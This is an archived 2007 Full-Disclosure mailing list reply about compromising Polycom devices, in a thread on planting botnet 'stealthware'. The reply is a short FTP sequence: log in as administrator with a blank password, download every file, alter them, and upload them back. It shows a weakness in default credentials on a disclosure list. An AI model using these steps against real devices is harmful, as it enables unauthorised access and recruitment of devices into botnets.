Re: [Full-disclosure] Polycom hacking
- From: Paul Schmehl <pauls@xxxxxxxxxxxx>
- Date: Fri, 29 Jun 2007 09:25:21 -0500
--On Thursday, June 28, 2007 22:25:08 -0400 Peter Dawson <slash.pd@xxxxxxxxx> wrote:
interesting concept.. harvesting a polycom device for Botnet's.That's easy.
hmmmmmmmmm.. the key would be how the heck to get the stealthware on
such a device ??
ftp target.domain.tld
user administrator
pass (blank)
mget *
alter files to suit
mput *
--
Paul Schmehl (pauls@xxxxxxxxxxxx)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
Attachment:
p7snOSVUVquxQ.p7s
Description: S/MIME cryptographic signature
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- References:
- Re: [Full-disclosure] Polycom hacking
- From: Paul Schmehl
- Re: [Full-disclosure] Polycom hacking
- From: Peter Dawson
- Re: [Full-disclosure] Polycom hacking
- Prev by Date: [Full-disclosure] XSS in CIA
- Next by Date: [Full-disclosure] [SECURITY] [DSA 1325-1] New evolution packages fix arbitrary code execution
- Previous by thread: Re: [Full-disclosure] Polycom hacking
- Next by thread: [Full-disclosure] iDefense Security Advisory 06.26.07: Multiple Vendor Kerberos kadmind Rename Principal Buffer Overflow Vulnerability
- Index(es):
Relevant Pages
|
